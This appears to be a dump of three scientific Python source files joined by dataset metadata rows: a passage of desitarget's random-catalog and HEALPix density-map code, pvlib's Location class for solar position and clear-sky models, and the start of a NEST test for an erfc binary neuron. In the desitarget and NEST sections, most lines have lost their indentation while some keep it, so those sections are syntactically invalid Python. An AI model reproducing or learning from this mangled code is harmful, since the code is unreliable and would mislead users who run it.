a desi, bgs and mws mask in that order (for either SV or the main survey).
nside : :class:`int`, optional, defaults to nside=256 (~0.0525 sq. deg. or "brick-sized")
The resolution (HEALPixel nside number) at which to build the map (NESTED scheme).
Returns
-------
:class:`~numpy.ndarray`
An array of target densities with one column for every bit returned by
:func:`desitarget.QA._load_targdens()`. The array contains the density of
those targets in pixels at the passed `nside`
"""
# ADM if a file name was passed for the targets catalog, read it in
if isinstance(targets, str):
log.info('Reading in target catalog...t = {:.1f}s'.format(time()-start))
targets = fitsio.read(targets)
# ADM retrieve the bitmasks.
if Mx[0]._name == 'cmx_mask':
msg = 'generating target densities does NOT work for CMX files!!!'
log.critical(msg)
raise ValueError(msg)
else:
desi_mask, bgs_mask, mws_mask = Mx
# ADM the number of pixels and the pixel area at the passed nside
npix = hp.nside2npix(nside)
pixarea = hp.nside2pixarea(nside, degrees=True)
# ADM retrieve the pixel numbers for every target RA/Dec
ras, decs = targets["RA"], targets["DEC"]
pixnums = hp.ang2pix(nside, np.radians(90.-decs), np.radians(ras), nest=True)
# ADM retrieve the bit names of interest
from desitarget.QA import _load_targdens
bitnames = np.array(list(_load_targdens(bit_mask=Mx).keys()))
# ADM and set up an array to hold the output target densities
targdens = np.zeros(npix, dtype=[(bitname, 'f4') for bitname in bitnames])
for bitname in bitnames:
if 'ALL' in bitname:
ii = np.ones(len(targets)).astype('bool')
else:
            if ('BGS' in bitname) and ('S_ANY' not in bitname):
                ii = targets["BGS_TARGET"] & bgs_mask[bitname] != 0
            elif (('MWS' in bitname or 'BACKUP' in bitname or
                   'GAIA_STD' in bitname) and ('S_ANY' not in bitname)):
                ii = targets["MWS_TARGET"] & mws_mask[bitname] != 0
            else:
                ii = targets["DESI_TARGET"] & desi_mask[bitname] != 0
if np.any(ii):
# ADM calculate the number of objects in each pixel for the
# ADM targets of interest
pixnum, pixcnt = np.unique(pixnums[ii], return_counts=True)
targdens[bitname][pixnum] = pixcnt/pixarea
return targdens
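# A minimal sketch of the bit test at the heart of get_targ_dens() for a
# single main-survey bit; the bit name "ELG" is purely illustrative.
def _sketch_select_bit(targets, bitname="ELG"):
    """Boolean mask of targets with `bitname` set in DESI_TARGET."""
    from desitarget.targetmask import desi_mask
    return (targets["DESI_TARGET"] & desi_mask[bitname]) != 0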
def pixmap(randoms, targets, rand_density, nside=256, gaialoc=None):
"""HEALPix map of useful quantities for a Legacy Surveys Data Release
Parameters
----------
randoms : :class:`~numpy.ndarray` or `str`
Catalog or file of randoms as made by :func:`select_randoms()` or
:func:`quantities_at_positions_in_a_brick()`. Must contain the
columns 'RA', 'DEC', 'EBV', 'PSFDEPTH_W1/W2/G/R/Z', 'NOBS_G/R/Z'
'GALDEPTH_G/R/Z', 'PSFSIZE_G/R/Z', 'MASKBITS'.
targets : :class:`~numpy.ndarray` or `str`
Corresponding (i.e. same Data Release) catalog or file of targets
as made by, e.g., :func:`desitarget.cuts.select_targets()`, or
        the name of a directory containing HEALPix-split targets that
can be read by :func:`desitarget.io.read_targets_in_box()`.
rand_density : :class:`int`
Number of random points per sq. deg. at which the random catalog
was generated (see also :func:`select_randoms()`).
nside : :class:`int`, optional, defaults to nside=256
Resolution (HEALPix nside) at which to build the (NESTED) map.
The default corresponds to ~0.0525 sq. deg. (or "brick-sized")
gaialoc : :class:`str`, optional, defaults to ``None``
Name of a FITS file that already contains a column "STARDENS",
which is simply read in. If ``None``, the stellar density is
constructed from files in $GAIA_DIR.
Returns
-------
:class:`~numpy.ndarray`
An array of useful information that includes
- HPXPIXEL: HEALPixel integers at the passed `nside`.
            - FRACAREA: Fraction of pixel with at least one observation
                        in each of g, r and z. Made with :func:`pixweight()`.
- STARDENS: The stellar density in a pixel from Gaia. Made
with :func:`stellar_density()`.
- EBV: E(B-V) in pixel from the SFD dust map, from the
median of EBV values in the passed `randoms`.
- PSFDEPTH_G, R, Z: PSF depth in the pixel, from the median
of PSFDEPTH values in `randoms`.
- GALDEPTH_G, R, Z: Galaxy depth in the pixel, from the
median of GALDEPTH values in `randoms`.
- PSFDEPTH_W1, W2: (AB PSF) depth in the pixel, from the
median of values in the passed `randoms`.
- PSFSIZE_G, R, Z: Weighted average PSF FWHM, in arcsec, in
the pixel, from the median of PSFSIZE
values in the passed random catalog.
            - FRACAREA_X: Fraction of pixel with at least one observation
                          in each band and none of the maskbits in X set
                          (bitwise OR, so, e.g., X=7 masks 2^0 | 2^1 | 2^2).
- One column for every bit that is returned by
:func:`desitarget.QA._load_targdens()`. Each column
contains the target density in the pixel.
:class:`str`
Survey to which `targets` corresponds, e.g., 'main', 'svX', etc.
Notes
-----
- If `gaialoc` is ``None`` then $GAIA_DIR must be set.
"""
# ADM if a file name was passed for the random catalog, read it in
if isinstance(randoms, str):
log.info('Reading in random catalog...t = {:.1f}s'.format(time()-start))
randoms = fitsio.read(randoms)
# ADM if a file name was passed for the targets catalog, read it in
if isinstance(targets, str):
log.info('Reading in target catalog...t = {:.1f}s'.format(time()-start))
# ADM grab appropriate columns for an SV/cmx/main survey file.
targcols = target_columns_from_header(targets)
cols = np.concatenate([["RA", "DEC"], targcols])
targets = read_targets_in_box(targets, columns=cols)
log.info('Read targets and randoms...t = {:.1f}s'.format(time()-start))
# ADM change target column names, and retrieve associated survey information.
_, Mx, survey, targets = main_cmx_or_sv(targets, rename=True)
# ADM determine the areal coverage of the randoms at this nside.
log.info('Determining footprint...t = {:.1f}s'.format(time()-start))
pw = pixweight(randoms, rand_density, nside=nside)
npix = len(pw)
# ADM areal coverage for some combinations of MASKBITS.
mbcomb = []
mbstore = []
for mb in [get_imaging_maskbits(get_default_maskbits()),
get_imaging_maskbits(get_default_maskbits(bgs=True))]:
bitint = np.sum(2**np.array(mb))
mbcomb.append(bitint)
log.info('Determining footprint for maskbits not in {}...t = {:.1f}s'
.format(bitint, time()-start))
mbstore.append(pixweight(randoms, rand_density,
nside=nside, maskbits=bitint))
# ADM get the target densities.
log.info('Calculating target densities...t = {:.1f}s'.format(time()-start))
targdens = get_targ_dens(targets, Mx, nside=nside)
# ADM set up the output array.
datamodel = [('HPXPIXEL', '>i4'), ('FRACAREA', '>f4'), ('STARDENS', '>f4'), ('EBV', '>f4'),
('PSFDEPTH_G', '>f4'), ('PSFDEPTH_R', '>f4'), ('PSFDEPTH_Z', '>f4'),
('GALDEPTH_G', '>f4'), ('GALDEPTH_R', '>f4'), ('GALDEPTH_Z', '>f4'),
('PSFDEPTH_W1', '>f4'), ('PSFDEPTH_W2', '>f4'),
('PSFSIZE_G', '>f4'), ('PSFSIZE_R', '>f4'), ('PSFSIZE_Z', '>f4')]
# ADM the maskbits-dependent areas.
datamodel += [("FRACAREA_{}".format(bitint), '>f4') for bitint in mbcomb]
# ADM the density of each target class.
datamodel += targdens.dtype.descr
hpxinfo = np.zeros(npix, dtype=datamodel)
# ADM set initial values to -1 so that they can easily be clipped.
hpxinfo[...] = -1
# ADM add the areal coverage, pixel information and target densities.
hpxinfo['HPXPIXEL'] = np.arange(npix)
hpxinfo['FRACAREA'] = pw
for bitint, fracarea in zip(mbcomb, mbstore):
hpxinfo['FRACAREA_{}'.format(bitint)] = fracarea
for col in targdens.dtype.names:
hpxinfo[col] = targdens[col]
# ADM build the stellar density, or if gaialoc was passed as a file, just read it in.
if gaialoc is None:
log.info('Calculating stellar density using Gaia files in $GAIA_DIR...t = {:.1f}s'
.format(time()-start))
sd = stellar_density(nside=nside)
else:
sd = fitsio.read(gaialoc, columns=["STARDENS"])
if len(sd) != len(hpxinfo):
log.critical('Stellar density map in {} was not calculated at NSIDE={}'
.format(gaialoc, nside))
hpxinfo["STARDENS"] = sd
# ADM add the median values of all of the other systematics.
log.info('Calculating medians of systematics from random catalog...t = {:.1f}s'
.format(time()-start))
ras, decs = randoms["RA"], randoms["DEC"]
pixnums = hp.ang2pix(nside, np.radians(90.-decs), np.radians(ras), nest=True)
# ADM some sorting to order the values to extract the medians.
pixorder = np.argsort(pixnums)
pixels, pixcnts = np.unique(pixnums, return_counts=True)
pixcnts = np.insert(pixcnts, 0, 0)
pixcnts = np.cumsum(pixcnts)
log.info('Done sorting...t = {:.1f}s'.format(time()-start))
# ADM work through the ordered pixels to populate the median for
# ADM each quantity of interest.
cols = ['EBV', 'PSFDEPTH_W1', 'PSFDEPTH_W2',
'PSFDEPTH_G', 'GALDEPTH_G', 'PSFSIZE_G',
'PSFDEPTH_R', 'GALDEPTH_R', 'PSFSIZE_R',
'PSFDEPTH_Z', 'GALDEPTH_Z', 'PSFSIZE_Z']
t0 = time()
npix = len(pixcnts)
stepper = npix//50
for i in range(npix-1):
inds = pixorder[pixcnts[i]:pixcnts[i+1]]
pix = pixnums[inds][0]
for col in cols:
hpxinfo[col][pix] = np.median(randoms[col][inds])
if i % stepper == 0 and i > 0:
elapsed = time() - t0
rate = i / elapsed
log.info('{}/{} pixels; {:.1f} pix/sec; {:.1f} total mins elapsed'
.format(i, npix, rate, elapsed/60.))
log.info('Done...t = {:.1f}s'.format(time()-start))
return hpxinfo, survey
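# A self-contained sketch of the sort-and-slice pattern used above to take
# per-HEALPixel medians without a Python-level group-by.
def _sketch_median_per_pixel(pixnums, values):
    """Dictionary mapping each unique pixel number to median(values)."""
    import numpy as np
    pixorder = np.argsort(pixnums)
    pixels, pixcnts = np.unique(pixnums, return_counts=True)
    # Cumulative counts delimit each pixel's block in the sorted order.
    pixcnts = np.cumsum(np.insert(pixcnts, 0, 0))
    return {pix: np.median(values[pixorder[pixcnts[i]:pixcnts[i+1]]])
            for i, pix in enumerate(pixels)}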
def select_randoms_bricks(brickdict, bricknames, numproc=32, drdir=None,
zeros=False, nomtl=True, cnts=True, density=None,
dustdir=None, aprad=None, seed=1):
"""Parallel-process a random catalog for a set of brick names.
Parameters
----------
brickdict : :class:`dict`
Look-up dictionary for a set of bricks, as made by, e.g.
:func:`~desitarget.skyfibers.get_brick_info`.
bricknames : :class:`~numpy.array`
The names of the bricks in `brickdict` to process.
drdir : :class:`str`, optional, defaults to None
See :func:`~desitarget.randoms.get_quantities_in_a_brick`.
zeros : :class:`bool`, optional, defaults to ``False``
See :func:`~desitarget.randoms.get_quantities_in_a_brick`.
nomtl : :class:`bool`, optional, defaults to ``True``
If ``True`` then do NOT add MTL quantities to the output array.
cnts : :class:`bool`, optional, defaults to ``True``
See :func:`~desitarget.skyfibers.get_brick_info`.
seed : :class:`int`, optional, defaults to 1
See :func:`~desitarget.randoms.randoms_in_a_brick_from_edges`.
Returns
-------
:class:`~numpy.ndarray`
a numpy structured array with the same columns as returned by
:func:`~desitarget.randoms.get_quantities_in_a_brick`. If
`zeros` and `nomtl` are both ``False`` additional columns are
returned, as added by :func:`~desitarget.targets.finalize`.
Notes
-----
- See :func:`~desitarget.randoms.select_randoms` for definitions of
`numproc`, `density`, `dustdir`, `aprad`.
"""
nbricks = len(bricknames)
log.info('Run {} bricks from {} at density {:.1e} per sq. deg...t = {:.1f}s'
.format(nbricks, drdir, density, time()-start))
# ADM the critical function to run on every brick.
def _get_quantities(brickname):
"""wrapper on get_quantities_in_a_brick() given a brick name"""
# ADM retrieve the edges for the brick that we're working on.
if cnts:
bra, bdec, bramin, bramax, bdecmin, bdecmax, _ = brickdict[brickname]
else:
bra, bdec, bramin, bramax, bdecmin, bdecmax = brickdict[brickname]
# ADM populate the brick with random points, and retrieve the quantities
# ADM of interest at those points.
randoms = get_quantities_in_a_brick(
bramin, bramax, bdecmin, bdecmax, brickname, drdir=drdir,
density=density, dustdir=dustdir, aprad=aprad, zeros=zeros,
seed=seed)
if zeros or nomtl:
return randoms
return finalize_randoms(randoms)
# ADM this is just to count bricks in _update_status.
nbrick = np.zeros((), dtype='i8')
t0 = time()
# ADM write a total of 25 output messages during processing.
    interval = max(nbricks // 25, 1)
def _update_status(result):
''' wrapper function for the critical reduction operation,
that occurs on the main parallel process '''
if nbrick % interval == 0 and nbrick > 0:
elapsed = time() - t0
rate = nbrick / elapsed
log.info('{}/{} bricks; {:.1f} bricks/sec; {:.1f} total mins elapsed'
.format(nbrick, nbricks, rate, elapsed/60.))
# ADM if we're going to exceed 4 hours, warn the user.
if nbricks/rate > 4*3600.:
msg = 'May take > 4 hours to run. May fail on interactive nodes.'
log.warning(msg)
nbrick[...] += 1 # this is an in-place modification.
return result
# - Parallel process input files.
if numproc > 1:
pool = sharedmem.MapReduce(np=numproc)
with pool:
qinfo = pool.map(_get_quantities, bricknames, reduce=_update_status)
else:
qinfo = list()
for brickname in bricknames:
qinfo.append(_update_status(_get_quantities(brickname)))
qinfo = np.concatenate(qinfo)
return qinfo
def supplement_randoms(donebns, density=10000, numproc=32, dustdir=None,
seed=1):
"""Random catalogs of "zeros" for missing bricks.
Parameters
----------
donebns : :class:`~numpy.ndarray`
Names of bricks that have been "completed". Bricks NOT in
`donebns` will be returned without any pixel-level quantities.
Need not be a unique set (bricks can be repeated in `donebns`).
density : :class:`int`, optional, defaults to 10,000
Number of random points per sq. deg. A typical brick is ~0.25 x
0.25 sq. deg. so ~(0.0625*density) points will be returned.
seed : :class:`int`, optional, defaults to 1
See :func:`~desitarget.randoms.randoms_in_a_brick_from_edges`.
A seed of 615 + `seed` is also used to shuffle randoms across
brick boundaries.
Returns
-------
:class:`~numpy.ndarray`
a numpy structured array with the same columns returned by
:func:`~desitarget.randoms.get_quantities_in_a_brick`
when that function is passed zeros=True.
Notes
-----
- See :func:`~desitarget.randoms.select_randoms` for definitions of
`numproc`, `dustdir`.
"""
# ADM find the missing bricks.
brickdict = get_brick_info(None, allbricks=True)
allbns = np.array(list(brickdict.keys()), dtype=donebns.dtype)
bricknames = np.array(list(set(allbns) - set(donebns)), dtype='U')
brickdict = {bn: brickdict[bn] for bn in bricknames}
qzeros = select_randoms_bricks(brickdict, bricknames, numproc=numproc,
zeros=True, cnts=False, density=density,
dustdir=dustdir, seed=seed)
# ADM one last shuffle to randomize across brick boundaries.
np.random.seed(615+seed)
np.random.shuffle(qzeros)
return qzeros
def select_randoms(drdir, density=100000, numproc=32, nside=None, pixlist=None,
bundlebricks=None, nchunks=10, brickspersec=2.5, extra=None,
nomtl=True, dustdir=None, aprad=0.75, seed=1):
"""NOBS, DEPTHs (per-band), MASKs for random points in a Legacy Surveys DR.
Parameters
----------
drdir : :class:`str`
Root directory for a Data Release from the Legacy Surveys
e.g. /global/project/projectdirs/cosmo/data/legacysurvey/dr7.
density : :class:`int`, optional, defaults to 100,000
Number of random points to return per sq. deg. As a brick is
~0.25 x 0.25 sq. deg. ~0.0625*density points will be returned.
numproc : :class:`int`, optional, defaults to 32
The number of processes over which to parallelize.
nside : :class:`int`, optional, defaults to `None`
(NESTED) HEALPixel nside to be used with the `pixlist` and
`bundlebricks` input.
pixlist : :class:`list` or `int`, optional, defaults to ``None``
Bricks will only be processed if the brick CENTER is within the
HEALpixels in this list, at the input `nside`. Uses the HEALPix
NESTED scheme. Useful for parallelizing. If pixlist is ``None``
then all bricks in the input `survey` will be processed.
bundlebricks : :class:`int`, defaults to ``None``
If not ``None``, then instead of selecting randoms, print a slurm
script to balance the bricks at `bundlebricks` bricks per node.
nchunks : :class:`int`, optional, defaults to 10
Number of smaller catalogs to split the random catalog into
inside the `bundlebricks` slurm script.
brickspersec : :class:`float`, optional, defaults to 2.5
The rough number of bricks processed per second (parallelized
across a chosen number of nodes). Used with `bundlebricks` to
estimate time to completion when parallelizing across pixels.
extra : :class:`str`, optional
Extra command line flags to be passed to the executable lines in
        the output slurm script. Used in conjunction with `bundlebricks`.
nomtl : :class:`bool`, optional, defaults to ``True``
If ``True`` then do NOT add MTL quantities to the output array.
    dustdir : :class:`str`, optional, defaults to $DUST_DIR+'/maps'
        The root directory pointing to SFD dust maps. If ``None`` the code
        will try to use $DUST_DIR+'/maps' before failing.
aprad : :class:`float`, optional, defaults to 0.75
Radii in arcsec of aperture for which to derive sky/fiber fluxes.
Defaults to the DESI fiber radius. If aprad < 1e-8 is passed,
the code to produce these values is skipped, as a speed-up, and
`apflux_` output values are set to zero.
seed : :class:`int`, optional, defaults to 1
Random seed to use when shuffling across brick boundaries.
The actual np.random.seed defaults to 615+`seed`. See also use
in :func:`~desitarget.randoms.randoms_in_a_brick_from_edges`.
Returns
-------
:class:`~numpy.ndarray`
a numpy structured array with the same columns as returned by
:func:`~desitarget.randoms.get_quantities_in_a_brick` that
includes all of the randoms resolved by the north/south divide.
:class:`~numpy.ndarray`
as above but just for randoms in northern bricks.
:class:`~numpy.ndarray`
as above but just for randoms in southern bricks.
"""
# ADM grab brick information for this data release. Depending on whether this
# ADM is pre-or-post-DR8 we need to find the correct directory or directories.
drdirs = pre_or_post_dr8(drdir)
brickdict = get_brick_info(drdirs, counts=True)
# ADM this is just the UNIQUE brick names across all surveys.
bricknames = np.array(list(brickdict.keys()))
# ADM if the pixlist or bundlebricks option was sent, we'll need the HEALPixel
# ADM information for each brick.
if pixlist is not None or bundlebricks is not None:
bra, bdec, _, _, _, _, cnts = np.vstack(list(brickdict.values())).T
theta, phi = np.radians(90-bdec), np.radians(bra)
pixnum = hp.ang2pix(nside, theta, phi, nest=True)
# ADM if the bundlebricks option was sent, call the packing code.
if bundlebricks is not None:
# ADM pixnum only contains unique bricks, need to add duplicates.
allpixnum = np.concatenate([np.zeros(cnt, dtype=int)+pix for
cnt, pix in zip(cnts.astype(int), pixnum)])
bundle_bricks(allpixnum, bundlebricks, nside, gather=True, seed=seed,
brickspersec=brickspersec, prefix='randoms',
surveydirs=[drdir], extra=extra, nchunks=nchunks)
# ADM because the broader function returns three outputs.
return None, None, None
# ADM restrict to only bricks in a set of HEALPixels, if requested.
if pixlist is not None:
# ADM if an integer was passed, turn it into a list.
if isinstance(pixlist, int):
pixlist = [pixlist]
ii = [pix in pixlist for pix in pixnum]
bricknames = bricknames[ii]
if len(bricknames) == 0:
log.warning('ZERO bricks in passed pixel list!!!')
log.info("Processing bricks in (nside={}, pixel numbers={}) HEALPixels"
.format(nside, pixlist))
# ADM a little more information if we're slurming across nodes.
if os.getenv('SLURMD_NODENAME') is not None:
log.info('Running on Node {}'.format(os.getenv('SLURMD_NODENAME')))
# ADM recover the pixel-level quantities in the DR bricks.
randoms = select_randoms_bricks(brickdict, bricknames, numproc=numproc,
drdir=drdir, density=density, nomtl=nomtl,
dustdir=dustdir, aprad=aprad, seed=seed)
# ADM add columns that are added by MTL.
if nomtl is False:
randoms = add_default_mtl(randoms, seed)
# ADM one last shuffle to randomize across brick boundaries.
np.random.seed(615+seed)
np.random.shuffle(randoms)
# ADM remove bricks that overlap between two surveys.
randomsres = resolve(randoms)
# ADM a flag for which targets are from the 'N' photometry.
from desitarget.cuts import _isonnorthphotsys
isn = _isonnorthphotsys(randoms["PHOTSYS"])
return randomsres, randoms[isn], randoms[~isn]
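# A minimal driver sketch; the DR directory and output file name are
# hypothetical and the density is kept low so the example runs quickly.
def _sketch_make_randoms(drdir, outfile="randoms-resolved.fits"):
    """Generate a small resolved random catalog and write it to disk."""
    import fitsio
    resolved, north, south = select_randoms(drdir, density=1000, numproc=4)
    fitsio.write(outfile, resolved, clobber=True)
    return north, south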
|
desihub/desitarget
|
py/desitarget/randoms.py
|
Python
|
bsd-3-clause
| 67,844
|
[
"Galaxy"
] |
faec90c2b2ede025827538a844c6ff2019102f9bac989d5e9a84d5d61cbb7464
|
"""
This module contains the Location class.
"""
# Will Holmgren, University of Arizona, 2014-2016.
import datetime
import pandas as pd
import pytz
from pvlib import solarposition, clearsky, atmosphere, irradiance
class Location(object):
"""
Location objects are convenient containers for latitude, longitude,
timezone, and altitude data associated with a particular
geographic location. You can also assign a name to a location object.
Location objects have two timezone attributes:
    * ``tz`` is an IANA timezone string.
* ``pytz`` is a pytz timezone object.
Location objects support the print method.
Parameters
----------
latitude : float.
Positive is north of the equator.
Use decimal degrees notation.
longitude : float.
Positive is east of the prime meridian.
Use decimal degrees notation.
tz : str, int, float, or pytz.timezone, default 'UTC'.
See
http://en.wikipedia.org/wiki/List_of_tz_database_time_zones
for a list of valid time zones.
pytz.timezone objects will be converted to strings.
ints and floats must be in hours from UTC.
altitude : float, default 0.
Altitude from sea level in meters.
name : None or string, default None.
Sets the name attribute of the Location object.
**kwargs
Arbitrary keyword arguments.
Included for compatibility, but not used.
See also
--------
pvsystem.PVSystem
"""
def __init__(self, latitude, longitude, tz='UTC', altitude=0,
name=None, **kwargs):
self.latitude = latitude
self.longitude = longitude
if isinstance(tz, str):
self.tz = tz
self.pytz = pytz.timezone(tz)
elif isinstance(tz, datetime.timezone):
self.tz = 'UTC'
self.pytz = pytz.UTC
elif isinstance(tz, datetime.tzinfo):
self.tz = tz.zone
self.pytz = tz
elif isinstance(tz, (int, float)):
self.tz = tz
self.pytz = pytz.FixedOffset(tz*60)
else:
raise TypeError('Invalid tz specification')
self.altitude = altitude
self.name = name
def __repr__(self):
attrs = ['name', 'latitude', 'longitude', 'altitude', 'tz']
return ('Location: \n ' + '\n '.join(
('{}: {}'.format(attr, getattr(self, attr)) for attr in attrs)))
@classmethod
def from_tmy(cls, tmy_metadata, tmy_data=None, **kwargs):
"""
Create an object based on a metadata
dictionary from tmy2 or tmy3 data readers.
Parameters
----------
tmy_metadata : dict
Returned from tmy.readtmy2 or tmy.readtmy3
tmy_data : None or DataFrame, default None
Optionally attach the TMY data to this object.
Returns
-------
Location
"""
# not complete, but hopefully you get the idea.
# might need code to handle the difference between tmy2 and tmy3
# determine if we're dealing with TMY2 or TMY3 data
tmy2 = tmy_metadata.get('City', False)
latitude = tmy_metadata['latitude']
longitude = tmy_metadata['longitude']
if tmy2:
name = tmy_metadata['City']
else:
name = tmy_metadata['Name']
tz = tmy_metadata['TZ']
altitude = tmy_metadata['altitude']
new_object = cls(latitude, longitude, tz=tz, altitude=altitude,
name=name, **kwargs)
# not sure if this should be assigned regardless of input.
if tmy_data is not None:
new_object.tmy_data = tmy_data
new_object.weather = tmy_data
return new_object
@classmethod
def from_epw(cls, metadata, data=None, **kwargs):
"""
Create a Location object based on a metadata
dictionary from epw data readers.
Parameters
----------
metadata : dict
Returned from epw.read_epw
data : None or DataFrame, default None
Optionally attach the epw data to this object.
Returns
-------
Location object (or the child class of Location that you
called this method from).
"""
latitude = metadata['latitude']
longitude = metadata['longitude']
name = metadata['city']
tz = metadata['TZ']
altitude = metadata['altitude']
new_object = cls(latitude, longitude, tz=tz, altitude=altitude,
name=name, **kwargs)
if data is not None:
new_object.weather = data
return new_object
def get_solarposition(self, times, pressure=None, temperature=12,
**kwargs):
"""
Uses the :py:func:`solarposition.get_solarposition` function
to calculate the solar zenith, azimuth, etc. at this location.
Parameters
----------
times : pandas.DatetimeIndex
Must be localized or UTC will be assumed.
pressure : None, float, or array-like, default None
If None, pressure will be calculated using
:py:func:`atmosphere.alt2pres` and ``self.altitude``.
temperature : None, float, or array-like, default 12
kwargs
passed to :py:func:`solarposition.get_solarposition`
Returns
-------
solar_position : DataFrame
Columns depend on the ``method`` kwarg, but always include
``zenith`` and ``azimuth``.
"""
if pressure is None:
pressure = atmosphere.alt2pres(self.altitude)
return solarposition.get_solarposition(times, latitude=self.latitude,
longitude=self.longitude,
altitude=self.altitude,
pressure=pressure,
temperature=temperature,
**kwargs)
def get_clearsky(self, times, model='ineichen', solar_position=None,
dni_extra=None, **kwargs):
"""
Calculate the clear sky estimates of GHI, DNI, and/or DHI
at this location.
Parameters
----------
times: DatetimeIndex
model: str, default 'ineichen'
The clear sky model to use. Must be one of
'ineichen', 'haurwitz', 'simplified_solis'.
solar_position : None or DataFrame, default None
DataFrame with columns 'apparent_zenith', 'zenith',
'apparent_elevation'.
dni_extra: None or numeric, default None
If None, will be calculated from times.
kwargs
Extra parameters passed to the relevant functions. Climatological
values are assumed in many cases. See source code for details!
Returns
-------
clearsky : DataFrame
Column names are: ``ghi, dni, dhi``.
"""
if dni_extra is None:
dni_extra = irradiance.get_extra_radiation(times)
try:
pressure = kwargs.pop('pressure')
except KeyError:
pressure = atmosphere.alt2pres(self.altitude)
if solar_position is None:
solar_position = self.get_solarposition(times, pressure=pressure,
**kwargs)
apparent_zenith = solar_position['apparent_zenith']
apparent_elevation = solar_position['apparent_elevation']
if model == 'ineichen':
try:
linke_turbidity = kwargs.pop('linke_turbidity')
except KeyError:
interp_turbidity = kwargs.pop('interp_turbidity', True)
linke_turbidity = clearsky.lookup_linke_turbidity(
times, self.latitude, self.longitude,
interp_turbidity=interp_turbidity)
try:
airmass_absolute = kwargs.pop('airmass_absolute')
except KeyError:
airmass_absolute = self.get_airmass(
times, solar_position=solar_position)['airmass_absolute']
cs = clearsky.ineichen(apparent_zenith, airmass_absolute,
linke_turbidity, altitude=self.altitude,
dni_extra=dni_extra, **kwargs)
elif model == 'haurwitz':
cs = clearsky.haurwitz(apparent_zenith)
elif model == 'simplified_solis':
cs = clearsky.simplified_solis(
apparent_elevation, pressure=pressure, dni_extra=dni_extra,
**kwargs)
else:
raise ValueError('{} is not a valid clear sky model. Must be '
'one of ineichen, simplified_solis, haurwitz'
.format(model))
return cs
def get_airmass(self, times=None, solar_position=None,
model='kastenyoung1989'):
"""
Calculate the relative and absolute airmass.
        Automatically chooses zenith or apparent zenith
depending on the selected model.
Parameters
----------
times : None or DatetimeIndex, default None
Only used if solar_position is not provided.
solar_position : None or DataFrame, default None
            DataFrame with columns 'apparent_zenith', 'zenith'.
model : str, default 'kastenyoung1989'
Relative airmass model
Returns
-------
airmass : DataFrame
Columns are 'airmass_relative', 'airmass_absolute'
"""
if solar_position is None:
solar_position = self.get_solarposition(times)
if model in atmosphere.APPARENT_ZENITH_MODELS:
zenith = solar_position['apparent_zenith']
elif model in atmosphere.TRUE_ZENITH_MODELS:
zenith = solar_position['zenith']
else:
raise ValueError('{} is not a valid airmass model'.format(model))
airmass_relative = atmosphere.get_relative_airmass(zenith, model)
pressure = atmosphere.alt2pres(self.altitude)
airmass_absolute = atmosphere.get_absolute_airmass(airmass_relative,
pressure)
airmass = pd.DataFrame(index=solar_position.index)
airmass['airmass_relative'] = airmass_relative
airmass['airmass_absolute'] = airmass_absolute
return airmass
def get_sun_rise_set_transit(self, times, method='pyephem', **kwargs):
"""
Calculate sunrise, sunset and transit times.
Parameters
----------
times : DatetimeIndex
Must be localized to the Location
method : str, default 'pyephem'
'pyephem', 'spa', or 'geometric'
kwargs are passed to the relevant functions. See
solarposition.sun_rise_set_transit_<method> for details.
Returns
-------
result : DataFrame
Column names are: ``sunrise, sunset, transit``.
"""
if method == 'pyephem':
result = solarposition.sun_rise_set_transit_ephem(
times, self.latitude, self.longitude, **kwargs)
elif method == 'spa':
result = solarposition.sun_rise_set_transit_spa(
times, self.latitude, self.longitude, **kwargs)
elif method == 'geometric':
sr, ss, tr = solarposition.sun_rise_set_transit_geometric(
times, self.latitude, self.longitude, **kwargs)
result = pd.DataFrame(index=times,
data={'sunrise': sr,
'sunset': ss,
'transit': tr})
else:
raise ValueError('{} is not a valid method. Must be '
'one of pyephem, spa, geometric'
.format(method))
return result
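# A minimal usage sketch (not part of pvlib itself). Tucson's coordinates
# are illustrative; the 'haurwitz' model is chosen because it requires no
# external turbidity data.
def _sketch_location_usage():
    times = pd.date_range(start='2019-06-01', periods=24, freq='1H',
                          tz='US/Arizona')
    tucson = Location(32.2, -110.9, tz='US/Arizona', altitude=700,
                      name='Tucson')
    return tucson.get_clearsky(times, model='haurwitz')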
|
anomam/pvlib-python
|
pvlib/location.py
|
Python
|
bsd-3-clause
| 12,154
|
[
"EPW"
] |
d39392b57291b1f27aa488ebfc8467e38dccbda98a9d96639c6905adedfd1d56
|
# -*- coding: utf-8 -*-
#
# test_erfc_neuron.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
Test implementation of erfc-neuron.
"""
import unittest
import nest
import numpy as np
from scipy.special import erfc
def get_mean_activity(detector, T):
"""
returns the mean activity of a single binary neuron connected to a spin
detector.
"""
states = nest.GetStatus(detector)[0]['events']['weights']
times = nest.GetStatus(detector)[0]['events']['times']
# add total duration at the end, since we need to take into account
# the time between the last state change and end of simulation
times = np.hstack((times, T))
if len(times) > 1:
assert(states[0] == 1)
# since neuron is starting in 0 state, summing every second period
# will give us the total time in the up state
activity = np.sum(np.diff(times)[::2]) / (T - times[0])
# if we have more than one update, we calculate a more accurate value
# for the mean activity, taking into account that our measurements are
# biased (we only record /given/ that a state change happened)
if len(times) > 2:
# biased average starting at down state, p(m(t)=1|m(t-1)=0)
M0 = 1. - (np.sum(np.diff(times)[1::2]) / (T - times[1]))
# biased average starting at up state, p(m(t)=1|m(t-1)=1)
M1 = activity
# unbiased estimate,
# p(m(t)=1)=\sum_{s \in {0,1}} p(m(t)=1|m(t-1)=s)p(m(t-1)=s),
# assuming stationary state: p(m(t)) = p(m(t-1)), solved for p(m=1)
activity = M0 / (1. + M0 - M1)
return activity
else:
return 0.
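def check_stationary_solution(M0, M1):
    """
    A small sanity-check sketch (not part of the original test suite):
    the unbiased estimate above solves the stationarity condition
    p = M0 * (1 - p) + M1 * p for p = p(m=1).
    """
    p = M0 / (1. + M0 - M1)
    assert abs(p - (M0 * (1. - p) + M1 * p)) < 1e-12
    return p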
def activation_function_theory(sigma, theta):
"""
returns the probability for a binary neuron to be in the up state, given
the parameters sigma and theta.
"""
return 0.5 * erfc(theta / (np.sqrt(2.) * sigma))
